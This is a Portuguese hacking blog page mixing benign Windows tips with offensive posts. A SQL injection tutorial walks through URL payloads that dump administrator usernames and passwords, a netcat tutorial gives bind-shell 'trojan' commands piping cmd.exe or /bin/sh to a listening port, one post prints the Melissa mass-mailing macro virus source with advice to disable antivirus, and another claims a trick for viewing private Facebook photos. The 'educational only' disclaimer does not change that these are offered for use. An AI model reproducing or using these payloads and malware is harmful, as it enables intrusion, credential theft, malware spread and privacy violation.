Seja Bem Vindo!

1-Não faço parceria com sites de pornografia, ou que contenha conteúdo pornográfico implícito assim como racismo.

2-Todas as Informações Contidas Neste Site São de Finalidade Única e Exclusivamente Educativa. O Site Evolução Hacker não se Responsabiliza pelo Uso Indevido destas Informações. Se Não Concordam com as Afirmações Acima Descritas, Por Favor não Prosseguir com a Visualização do Site.

3-Todos os links que se encontram no Site estão hospedados na Internet.

4-Qualquer programa protegido por algum tipo de lei deve permanecer, no máximo, 24 horas no Nosso computador.

5-A aquisição desses arquivos pela Internet é de única e exclusiva responsabilidade do utilizador..

6-O dono, webmaster ou qualquer outra pessoa que tenha relacionamento com a produção do Site não tem responsabilidade alguma sobre os arquivos que o utilizadores venhas a descarregar e qual a utilidade que lhe vai dar..

7-Caso tenham alguma dúvida quanto a instalação ou utilização do(s) programa(s) aqui apresentados, recomendo que procurem ajuda de alguém mais experiente, não fornecerei nenhuma explicação em especial.

8-Para parceria. Desde que Não Afecte o Ponto 1, Bastará Adicionem o meu Banner e Avisarem na CBOX

Eu Aceito os Termos!

Text

Evolução Hacker V7.0

Estamos precisando de post
adores
você que entende do assunto entre em contato com
o nosso Msn hackerdarkfbii@hotmail.com

PARA VC SER O NOVO(A) POSTADOR(A) DO Site VC PRECISA DEIXAR UM COMENTÁRIO COM O SEU NOME :_________________ E O SEU ENDEREÇO DE E-MAIL:______________________. E EXPLICANDO PQ VC QUER SER O NOVO(A) POSTADOR(A) DO Site

OBS : ESCOLHEREMOS O NOVO(A) POSTADOR(A) DEPENDENDO DA EXPLICAÇÃO .

Atenciosamente: [ADM Evolução Hacker]

.

..

Mostrando postagens com marcador Cursos-Tutorial-Apostilas-Dicas. Mostrar todas as postagens
Mostrando postagens com marcador Cursos-Tutorial-Apostilas-Dicas. Mostrar todas as postagens

domingo, 30 de janeiro de 2011

Download - Informações Gerais de Vírus

Compare Pre�os: Informações Gerais de Vírus

Um vírus é um software projectado e escrito para afectar de forma adversa o seu computador ao alterar a forma como ele trabalha sem o seu conhecimento ou permissão. Em termos mais técnicos, um vírus é um código de programa que se implanta num dos seus arquivos executáveis e espalha-se sistematicamente de um arquivo para outro. Os vírus de computador não são gerados espontaneamente. Necessitam ser escritos e ter um objectivo específico. Em geral, um vírus tem duas funções distintas:
Dissemina-se de um arquivo para outro sem sua participação ou conhecimento. Tecnicamente, isso é conhecido como auto-replicação e propagação. Implementa o sintoma ou o dano planeado pelo seu criador. As suas actividades incluem apagar um disco, corromper seus programas ou simplesmente provocar caos no seu computador. Tecnicamente, isso é conhecido como acção do vírus, que pode ser benigna ou maligna conforme a imaginação do seu criador.
Um vírus benigno é um vírus que foi projectado para não provocar danos ao seu computador. Por exemplo, um vírus que se oculta até uma data ou hora predeterminada e, em seguida, não faz nada mais do que exibir algum tipo de mensagem é considerado benigno.
Um vírus maligno é aquele que tenta causar danos ao seu computador, embora o dano possa não ser intencional. É significativa a quantidade de vírus desses tipo que causa danos devido a uma programação inadequada e bugs autênticos no código viral. Um vírus maligno pode alterar um ou mais dos seus programas para não funcionarem como deveria. O programa infectado pode terminar de modo anormal, gravar informações incorrectas nos seus documentos ou o vírus pode alterar as informações do directório numa das áreas de sistema. Isto pode evitar que a partição seja montada ou você pode não conseguir iniciar um ou mais programas ou os programas podem não conseguir localizar os documentos que vocês querem abrir.
Alguns dos vírus identificados são benignos; no entanto, uma alta percentagem deles é bem maligno. Alguns dos vírus mais malignos apagarão seu disco rígido inteiro ou excluirão arquivos.

Vírus: A Ameaça É Real

Não é nenhum exagero dizer que os vírus poderiam interromper o fluxo livre de informações que foi estabelecido pelas TI pessoal nos últimos 10 anos. Na verdade, o prevalecimento dos vírus fez surgir uma nova era de informática insegura, chegando a um ponto em que quem ignorar as precauções corre riscos sérios. Considerando as graves advertências de perigo - e os incidentes já registados - é um mistério que existam pessoas da área de informática que insistem em afirmam que as novas informações sobre vírus são exageradas.
O Centro Nacional de Dados sobre Crimes de Informática em Los Angeles estima que as empresas americanas tenham tido prejuízos de US$550 milhões decorrentes de acessos não-autorizados aos computadores a cada ano. A quantidade de tempo perdido pode ser incalculável.
Indicando a gravidade do problema, o governo federal ajudou a formar uma equipe da SWAT para combater os vírus, chamada de Computer Emergency Response Team (Equipe de Resposta de Emergência de Computadores). Sua tarefa é investigar as ameaças à segurança nas principais redes de computadores em todo o país. A Software Publishers Association também adoptou determinadas medidas para solucionar o problema.
Além disso, no ano anterior muitas empresas da lista da Fortune começaram a estabelecer políticas de computação para lidar com vírus. Em muitos casos, esses novos procedimentos definirão práticas para testar todos os softwares antes que eles sejam colocados em uma rede ou restringir o download de software de BBSs electrónicas. Literalmente ninguém que utilize computadores - nem o governo ou a polícia, nem mesmo, o seu banco - está imune a vírus de computadores.
Suponhamos que uma nave espacial execute uma ordem de um programa de software infectado por vírus. Ou um controlador de tráfego aéreo receba uma informação incorrera de um sistema contaminado. Ou os registos financeiros da sua empresa sejam apagados de repente ou alterados permanentemente.
Esses cenários não são necessariamente fantasias de um mundo imaginário. Até agora, os vírus de computadores já contaminaram uma grande variedade de computadores, incluindo empresas da Fortune 500, órgãos do governo, grandes universidades, jornais e redes de grande porte que ligam um grande número de computadores e gigantescos volumes de informações.

Tipos de Vírus de Computadores

Um vírus de computadores é um programa projectado para se replicar e disseminar-se sozinho, de preferência sem que você saiba que ele existe. Os vírus de computador são disseminados anexando-se a outro programa (como o seu programa de processador de texto) ou ao sector de inicialização de um disquete. Quando um arquivo infectado é executado ou quando o computador é iniciado de um disco infectado, o próprio vírus é executado. Frequentemente, instala-se na memória, aguarda infectar o próximo programa que for executado ou o próximo disco que for acedido. Além disso, muitos vírus também executam um evento de gatilho, como exibir uma mensagem em uma determinada data ou excluir arquivos após o programa infectado ser executado um determinado número de vezes. Embora alguns destes eventos de gatilho sejam benignos (como os que exibem mensagens), outros podem ser destruidores. A maioria dos vírus é inofensiva, exibem mensagens ou imagens ou não fazem nada. Outros vírus são irritantes, reduzindo o desempenho do sistema ou provocando pequenas alterações na exibição do seu computador. No entanto, alguns vírus são realmente ameaçadores, causando falhas no sistema, danificando arquivos e perdendo dados.

Infectadores de Arquivo
Esses vírus anexam-se a (ou substituem) arquivos .COM e .EXE, embora em alguns casos possam infectar arquivos com extensões .SYS, .DRV, .BIN, .OVL e OVY. Com esse tipo de vírus, os programas não infectado geralmente são tornam infectados quando executados com o vírus na memória. Em outros casos, eles são infectados quando são abertos (como ao usar o comando DIR do DOS) ou o vírus simplesmente infecta todos os arquivos no diretório de onde ele foi executado (um infectador direto).

Infectadores de Sector de Inicialização
Cada unidade lógica, disco rígido e disco flexível, contém um sector de inicialização. Isto é verdade mesmo em discos que não são inicializáveis. Esse sector de inicialização contém informações específicas referentes à formatação do disco, aos dados armazenados nele e também contém um pequeno programa chamado de programa de inicialização (que é carregado nos arquivos de sistema do DOS). O programa de inicialização exibe a mensagem familiar "Disco sem sistema ou erro no disco" se os arquivos de sistema não estiverem presentes. Também é o programa que é infectado por vírus. Você é contaminado por um vírus de sector de inicialização deixando uma disquete infectada numa unidade e reiniciando a máquina. Quando o programa de sector de inicialização é lido e executado, o vírus entra na memória e infecta seu disco rígido. Lembre-se de que como cada disco tem um sector de inicialização, é possível (e comum) infectar uma máquina de um disco de dados.
NOTA: As disquetes flexíveis e as unidades de disco rígido contêm sectores de inicialização.

Infectores de Registro de Inicialização Mestre
O primeiro sector físico de cada disco rígido (Lado Ø, Trilha Ø, Setor 1) contém o Registro de Inicialização Mestre do disco e a Tabela da Partição. O Registo de Inicialização Mestre tem um pequeno programa incorporado chamado de Programa de Inicialização Mestre, que procura os valores na tabela de partição para o local inicial da partição inicializável e, em seguida, informa ao sistema para ir até o local e executar qualquer código neste local (Lado 1, Trilha Ø, Setor 1) que seja um sector de inicialização válido. Em discos flexíveis, estes mesmos vírus infectam os sectores de inicialização.
Você é contaminado por um vírus de Registro de Inicialização Mestre exactamente da mesma forma que por um vírus de sector de inicialização -- bastará deixar uma disquete infectada numa unidade e reiniciando a máquina. Quando o programa do sector de inicialização é lido e executado, o vírus entra na memória e infecta a MBR do seu disco rígido. Novamente, como cada disco tem um sector de inicialização, é possível (e comum) infectar uma máquina de um disco de dados.

Vírus multiparticionados
Os vírus multiparticionados são uma combinação dos vírus listados acima. Infectarão os arquivos e MBRs ou os arquivos e os sectores de inicialização. Esses tipos de vírus são raros actualmente, mas o número de casos vem crescendo de forma constante.

Vírus de Macintosh

O que os Vírus Fazem
Alguns vírus são programados especificamente para danificar os dados no seu computador corrompendo programas, excluindo arquivos ou apagando todo o seu disco rígido. Muitos dos vírus de Macintosh conhecidos actualmente não foram desenvolvidos para provocar danos. No entanto, devido a bugs (erros de programação) dentro do vírus, um sistema infectado pode se comportar de modo imprevisível.
O que os Vírus Não Fazem
Os vírus de computador não infectam arquivos nos discos protegidos contra gravação e não infectam documentos, excepto em caso de vírus de macro do Word, que infectam apenas documentos e modelos escritos em Word 6.0 ou posterior. Eles não infectam arquivos compactados. No entanto, os aplicativos em um arquivo compactado poderiam ter sido infectados antes de serem compactados. Os vírus também não contaminam hardware de computador, como monitores ou chips de computadores, eles só contaminam software.
Além disso, os vírus de Macintosh não contaminam software de computadores baseados em DOS e vice-versa. Por exemplo, o infame Michelangelo não contamina aplicativos de Macintosh. Novamente, uma excepção a esta regra são os vírus de macro de Word e Excel, que infectam planilhas, (
Mais informação aqui: Wikipedia: planilhas) documentos e modelos que podem ser abertos por computadores com Windows ou Macintosh.
Finalmente, os vírus necessariamente não permitem que você saiba que eles existem - mesmo quando fazem algo destrutivo.

Como os Vírus São Disseminados
Os vírus são disseminados quando você inicia aplicativos infectados ou inicializa seu computador de um disco que tem arquivos de sistema infectados. Por exemplo, se um processador de texto tiver um vírus, este vírus será activado quando você executar o programa. Quando um vírus está na memória, geralmente infecta os aplicativos que você executa, incluindo os aplicativos de rede (se você tiver acesso de gravação às pastas ou aos discos da rede).
Os vírus comportam-se de formas diferentes. Alguns vírus permanecem activos na memória até que você desligar o computador. Outros vírus permanecem activos apenas enquanto os aplicativos infectados estiverem em execução. Desligar o computador ou sair do aplicativo remove o vírus da memória, mas não remove o vírus do arquivo ou disco infectado. Ou seja, se o vírus residir em um arquivo de sistema, ele será activado na próxima vez em que você iniciar o seu computador do disco infectado. Se o vírus residir num aplicativo, será activado novamente na próxima vez em que os aplicativos forem executados.

Mais info: Symantec


Download - Facebook Hack: - Como ver o Album Privado de Qualquer Utilizador

Compare Pre�os: Facebook Hack: - Como ver o Album Privado de Qualquer Utilizador

O Facebook tem crescido estupendamente popular ao longo dos anos. Embora a privacidade é uma coisa de garantia para alguns, é incómodo para a maioria. Então, aqui está um truque que vai ajudar você a ver qualquer perfil bloqueado. Esse truque vai deixar você ver fotos com a tag de ninguém, mesmo que sejam privados para você.

Truque

Passo 1:
Entrar no Facebook e não se preocupar em fazer outra conta. Eles não serão capazes de vos rastrear para banir.

Passo 2:
* Procurar ID da pessoa perfil único.
* Procure-os e clique em Exibir amigos ou enviar mensagens.
* Escreva o ID exclusivo da barra de endereços (só os números) ou copiá-lo para outro lugar.

Passo 3:
Agora que você tem o seu ID do perfil original você pode usar nos próximos dois links para ver um total de 40 fotos com a tag:

Se quiser ver fotos com a tag adicionado por outros use este link:

http://www.facebook.com/photo.php?pid=12345678&op=1&view=all&subj = [Unique ID] & id = [ID único]

Se quiser ver fotos com a tag adicionado por se usar este link:

http://www.facebook.com/photo.php?pid=13245678&op=1&view=user&subj = [Unique ID] & id = [ID único]

- Cada link contém dois lugares para [ID único] basta substituir este com a identificação única da pessoa que você copiou no primeiro passo.
- Retire os suportes IN [UNIQUE ID] .. substituir pelo o ID do perfil que você copiou.

Passo 4:
Agora você pode ver até 40 fotos de alguém num perfil particular. Enjoy.

[Nota: Informação via brettz, não foi testada por mim. É apenas para fins informativos e não destinados a ser utilizados.]

segunda-feira, 24 de janeiro de 2011

Download - Curso Info Wi-Fi e 3G

Compare Pre�os: Curso Info Wi-Fi e 3G

Neste curso você vai acompanhar, de forma simples e directa, capítulos que vão ajuda-lo a configurar redes para acesso sem fio por meio de notebooks, além de celulares e smartphones com suporte a Wi-Fi. Muito Bom Vale Conferir! Curso Info Wi-Fi e 3G – 2010

Formato: SWF
Tamanho: 79 Mb
Idioma: Português

Hotfile

quarta-feira, 19 de janeiro de 2011

Download - Sites Bloqueados como desbloquear? Sites não abrem? Como resolver.

Compare Pre�os: Sites Bloqueados como desbloquear? Sites não abrem? Como resolver.


Passo a descrever como podem resolver um problema comum que acontece com muita gente mas que poucas pessoas conhecem a forma certa de corrigir este problema.
Se não estava conseguirem aceder por exemplo ao site da microsoft por indicar estar sempre offline (Não Abre)
Verifiquem o vosso arquivo hosts encontrado na pasta C:\WINDOWS\system32\drivers\etc para ver se o problema está lá ou se está tudo normal, ou seja não tem nenhum site bloqueado, e o vosso navegador também não esteja a bloquear nenhum site. Foi ai que resolvi recorrer ao nosso grande amigo GOOGLE para ver se encontrava a solução. Posso dar alguma dicas para instalar um monte de programas, Alterar o MTU do speed, Verificar o arquivo hosts. Podem então verificar se o problema está vosso CLIENTE DNS que pode ser editado usando o arquivo SERVICES.MSC.

Basta ir ao menu iniciar em EXECULTAR e digitar SERVICES.MSC

Irá abrir uma janela com várias opções, Executem uma procura até achar: “Cliente DNS


Cliquem duas vezes e vai aparecer uma janela como abaixo:

Se clicarem em PARAR isto já resolverá o vosso problema, Mas poderá voltar a acontecer assim que reiniciarem o computador, Então para que isto nunca mais aconteça sugiro que configurem o tipo de inicialização para MANUAL porque obviamente o vosso deve estar configurado para inicializar AUTOMÁTICO.Em seguida basta clicar emAPLICAR e voltar a atentar abrir o site que não consegui entrar.

Download - Tutorial NetCat Completo!

Compare Pre�os: Tutorial NetCat Completo!

Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter.
Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = activa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se ligar a TELNET
O = Gera um log em formato hexadecimal
W = Determina um tempo máximo para aguardar uma reposta
E = Redirecciona arquivos
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.

Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:

Colocando uma porta em escuta:

Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saída do programa na tela “listening on [any] 8080 …“, caso a opção -v não fosse inserida este texto não seria mostrado.

Fazer um Port-Scanner com o netcat:
nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazer um trojan com o netcat:
Note que basta redireccionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.

Fazer um ataque de brute force com o netcat:
O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 <> c:\log.txt note que você precisara de um arquivos com nome de utilizadores em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazer um sniffer com o netcat:
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é necessário dizer que podemos também gravar toda saída num arquivo TXT, mas para você que ainda não entendeu ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt

terça-feira, 18 de janeiro de 2011

Download - Tutorial SQL Injection (MySQL)

Compare Pre�os: Tutorial SQL Injection (MySQL)


Neste tutorial é feito uma descrição de como utilizar o Sql Injection para obter algumas informações.
Primeiro: O que é Sql Injection?
É uma das vulnerabilidade mais comuns actualmente. Esta vulnerabilidade permite ao atacante executar consultas à base de dados inserindo querys (comandos Sql) na url do site obtendo, assim, informações confidenciais.

1 – Sql Injection (clássico ou baseado em erros).
Medidas adoptadas para explorar a vulnerabilidade.

A) Verificar a Vulnerabilidade.
Abaixo um exemplo qualquer para análise da vulnerabilidade. O link fictício mostra uma página qualquer de um site, imaginemos que seja uma página de um fórum hacker lixo de invasão.

http://www.site.com/news.php?id=5

Para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( ‘ ). Abaixo é mostrado a forma como a url ficará.

http://www.site.com/news.php?id=5'

Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the...

O erro acima diz que você possui um erro na síntaxe da consulta Sql e pede para verificar o manual correspondente ao SGBD que está a ser utilizado. “Até parece que é o administrador do site”
Agora que verificamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Iremos ao passo seguinte.

B) – Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.
Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY.

Mas como utilizar este comando Sql?
Simples! Ao final da url adicionem o comando order by que vai adicionar uma sequência de Colunas/Tabelas, ou seja, você pode accionar a coluna correspondente. Caso queiram olhar a coluna 1, ordenem assim:

http://www.site.com/news.php?id=5 order by 1

Se não aparecer nenhum erro é por que esta Coluna/Tabela número 1 existe. Lembrem-se que nesta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro informando que a Coluna/Tabela é inexistente na base de dados.

http://www.site.com/news.php?id=5 order by 1/* <-- Sem erro
http://www.site.com/news.php?id=5 order by 2/* <-- Sem erro
http://www.site.com/news.php?id=5 order by 3/* <-- Sem erro
http://www.site.com/news.php?id=5 order by 4 <-- Com erro

O exemplo acima, é atribuido Colunas/Tabelas (1..2..3..4), no entanto, é mencionado erro na Coluna/Tabela 4. Conclui-se então que esta Coluna/Tabela é inexistente e que a base de dados possui apenas 3 Colunas/Tabelas.

C) – Utilizando a função UNION.
Esta função poderosa é responsável por unir vários dados localizados em Colunas/Tabelas diferentes.

Vamos utilizar o exemplo abaixo para melhor exemplificar.
http://www.site.com/news.php?id=5 union all select 1,2,3

Explicando a Sql:
O exemplo acima vai possibilitar ao “Injectador” visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.
...?id ... union all select 1,2,3

Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.site.com/news.php. Está e a ordem que devem atribui ao comando colocado na url do site.

D) – Descobrindo a versão do SGBD (MySql).
http://www.site.com/news.php?id=5 union all select 1,2,3

Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes na base de dados. Agora para visualizar a versão da base de dados é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.

http://www.site.com/news.php?id=5 union all select 1,@@version,3

Caso não der certo, recebem uma mensagem de erro semelhante a esta:
"union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

Para resolver este erro necessitamos utilizar a função convert(). Exemplo abaixo:
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/

Ou então as funções hex() e unhex();
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/

Com os procedimentos acima, conseguem achar a versão do SGBD MySql.

E) – Obtendo o nome da Coluna/Tabela.
Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:
Geralmente os DBA’s (Administradores de Base de Dados) utilizam nomes comuns como padronização para as suas Colunas/Tabelas como:

user, utilizador, admin, member, membro, password, passwd, pwd, user_name

Lógico que isto depende bastante de DBA’s e qual tipo de padronização ele estiver a ser utilizada.
Na consulta abaixo o “Injectador” bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin

Observe que acima a query diz: “Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do utilizador admin”.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin

Caso apareça erro, vá mudando o nome da coluna… afinal é a técnica da tentativa e erro.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/

Acima, observe que a consulta começa a ficar refinada: “Mostre-me os valores Coluna/Tabelas 1, o nome do utilizador e 3 do utilizador admin”. Ou seja, suponha que o DBA tenha criado uma base de dados onde separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.

http://www.site.com/news.php?id=5 union all select 1,username, password from admin

Caso a consulta der certo, no ecran aparecerá o nome do utilizador e a senha. Esta senha aparecer no ecran tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvida.

Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Dependendo do campo, fica a seu critério inserir em hexadecimal (0×3a) ou utilizando o padrão Ascii (char(58)).
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Já aparecerá os valores com o nome do utilizador administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra..

Dica: Quando está difícil para achar o nome da Coluna/Tabela, é sempre bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

F) – MySql 5.
Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.

Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas da base de dados. É este arquivo que será o nosso alvo.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.

Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.
Observe abaixo que é colocado como limite 0, 1.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Dica: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de vocês, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então deveriam acrescentar uma por uma até achar… 1, 2; …, …; 42, 43.

Espero que tenham entendido esta parte.
Para obter o nome das colunas, também é utilizada a mesma lógica. Só que agora no arquivo information_schema.columns.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos utilizador pode-se fazer a consulta abaixo:
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/

Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de utilizadores.
Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

Acima simplesmente pedimos para mostrar o usuário, a senha e o email.
example: admin:hash:whatever@blabla.com

Isto é um exemplo de Sql Injection. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql. Não esquecer que nada cai do céu, pelo facto estejam sempre em aprendizagem para que possam sempre ir progredindo.

quinta-feira, 13 de janeiro de 2011

Download - Curso Fácil Windows Seven

Compare Pre�os: Curso Fácil Windows Seven

Curso Fácil Windows Seven

Conteudo
Area de trabalho,
Internet Explorer 8, Windows Explorer,
Media Player 12, Visualizador de imagens
e muito mais.

Tamanho: 120.33 Mb
Formato: Rar/Swf
Idioma: Português BR
Curso Fácil Windows Seven

Ou Download

sexta-feira, 7 de janeiro de 2011

Download - Windows 7: como fazer o Windows reconhecer a impressora padrão de cada rede

Compare Pre�os: Windows 7: como fazer o Windows reconhecer a impressora padrão de cada rede

Caso o seu computador se conecte a diferentes locais de rede (em casa, no trabalho e em locais públicos, por exemplo) e utilize uma impressora diferente para cada um destes locais, o Windows 7 permite que você atribua uma impressora padrão para cada lugar.

A tarefa é bastante simples e utiliza apenas as ferramentas presentes no sistema. Em poucos minutos, você ganha muito mais tempo nas próximas vezes em que for imprimir documentos.

Para fazê-lo, abra o Painel de Controle, e dentro da opção “Hardware e sons”, clique em “Exibir Impressoras e Dispositivos”.

Note que, por padrão, a barra de ferramentas da janela que se abre exibe poucas alternativas. Para fazer com que a opção “Gerenciar impressoras padrão” apareça, primeiro clique sobre qualquer impressora reconhecida pelo computador. A seguir, entre nela.

Dentro da nova janela, marque a opção “Alterar minha impressora padrão quando eu mudar de rede” para habilitar a troca de impressoras pelo Windows. Escolha então um local em “Selecionar rede” e atribua um dispositivo para o local em “Selecionar impressora”. Ao final, não se esqueça de clicar em “Adicionar” para salvar a alteração.

Configure desta maneira.

Agora, repita o processo para todas as redes que você acessa que contêm uma impressora, tomando o cuidado de atribuir corretamente o dispositivo presente em cada local.

OBS: caso você nunca tenha conectado seu computador a mais de um local de rede ou não possua nenhuma impressora instalada ao comutador, é provável que a opção “Gerenciar impressoras padrão” não apareça na Barra de tarefas do Gerenciador de impressoras e dispositivos.

segunda-feira, 5 de julho de 2010

Download - Criando o vírus Melissa Atenção Não nos responsabilizamos por danos Causados Ao seu Windows use por sua conta em Risco.

Compare Pre�os: Criando o vírus Melissa Atenção Não nos responsabilizamos por danos Causados Ao seu Windows use por sua conta em Risco.

OQ É UM VIRUS?


O termo geral de vírus de computador normalmente cobre programas que modificam o funcionamento de umcomputador (incluindo danos às máquinas) e que conseguem se autocopiar. Um verdadeiro vírus precisa de um programa hospedeiro para funcionar. O Melissa usa um documento do Word Novamente!
tenção Não nos responsabilizamos por danos Causados Ao seu Windows use por sua conta em Risco.
Abra o Bloco de Notas e Cole o Código a baixo

2º Salva com o nome Melissa.vbs

Não faça o teste no seu PC,

Não seja Noob

Um conselho naum vá achando que o .VBS é igual ao .BAT não então nem teste se não quiser ver a desgraça no seu PC
Olha é aconselhavél que você desative seu antivirus se não ele não vai deixar você fazer ele. É old mais é legal.

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “”
Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo”
Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” &
Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t
show anyone else Wink”
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”

Esse virus faz com que o PC da vitima fique completamente louco

Não faça o teste no seu PC,
Não seja Noob!

quinta-feira, 22 de abril de 2010

Download - As Motivações dos Hackers

Compare Pre�os: As Motivações dos Hackers





Há muito tempo se ouve falar de adolescentes que passam a noite inteira
invadindo sistemas de computadores. Entretanto, muito pouco se fala dos mais
perigosos hackers. O motivo pelo qual os jovens ganham destaque na mídia é a
sua captura, pois eles não possuem conhecimento suficiente para que se
mantenham ocultos por muito tempo. Por pura inexperiência, deixam rastros por
onde passam, pelo descuido e inconseqüência, ou porque simplesmente não têm
motivos para se esconderem.

Do outro lado, estão os hackers profissionais, extremamente cuidadosos com
suas investidas, e são muito mais difíceis de se detectar e capturar. Afinal, estes
não estão mais brincando...

Independente do tipo de hacker, as motivações para seus ataques são bastante
variadas, e podemos dividir suas ações em algumas categorias distintas:

Espionagem Industrial: Pode ocorrer de uma empresa contratar um hacker para
que este invada o sistema da concorrência e descubra seus planos, roube seus
programas ou até mesmo suas políticas de parcerias e de investimento.
(geralmente praticadas por hackers profissionais)

Proveito Próprio: O hacker pode invadir um sistema para roubar dinheiro,
transferir bens, cancelar dívidas ou até mesmo ganhar concursos. Qualquer ação
em que ele seja diretamente beneficiado.

Inexperiência: Há também o caso de uma invasão ocorrer por ignorância. Por
exemplo, um funcionário que acessa sua conta da empresa através do seu micro
em casa. Dependendo da política de segurança da empresa, isto pode ser
considerado uma invasão, mesmo que o usuário não tenha conhecimento do
problema que pode causar.

Vingança: Um ex-funcionário, tendo conhecimento do sistema, pode causar
vários problemas, se o gerente de segurança da empresa não "cortar" seu acesso
imediatamente após sua saída da empresa. Ou, um parceiro de pesquisas pode
acessar "mais do que deve" após a quebra de um contrato, trazendo
complicações e prejuízos à empresa.

Status ou Necessidade de Aceitação: Uma invasão difícil pode fazer com que o
invasor ganhe um certo status junto aos seus colegas. Isso pode acarretar uma
